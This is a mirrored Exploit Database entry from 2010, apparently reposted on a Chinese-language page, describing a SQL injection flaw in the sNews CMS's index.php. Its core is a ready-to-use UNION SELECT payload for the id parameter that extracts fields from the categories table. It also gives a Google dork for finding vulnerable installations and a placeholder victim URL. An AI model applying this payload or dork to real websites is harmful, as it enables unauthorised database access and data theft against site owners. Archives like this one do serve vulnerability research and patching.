sNews – ‘index.php’ SQL Injection

• Exploit Database
• 37 阅读

• 作者： MajoR
  日期： 2010-07-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14458/

• # Exploit Title:sNews (index.php) SQL Injection Vulnerability
  
  # Date: 2010-07-24
  
  # Author: MajoR
  
  # Software Link: http://snews.awddesign.co.uk
  
  # Version: N/A
  
  # Tested on: Wnidows xp SP2
  
  # CVE : N/A
  
  
  
  ====================================================sNews (index.php) SQL Injection Vulnerability
  ===================================================
  
  Author : MajoR
  Email: Ma-j-oR@hotmail.fr
  
  DORK:"Powered by sNews " inurl:index.php?id=
  
  ===================================================
  
  
  [+] Vulnerable File : 
  
  http://www.Victime.com/sNews/index.php?id=
  
  [+] ExploiT :
  
  
  -82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--
  
  ====================================================
  
  
  Greetingz To SlaSSi & Xella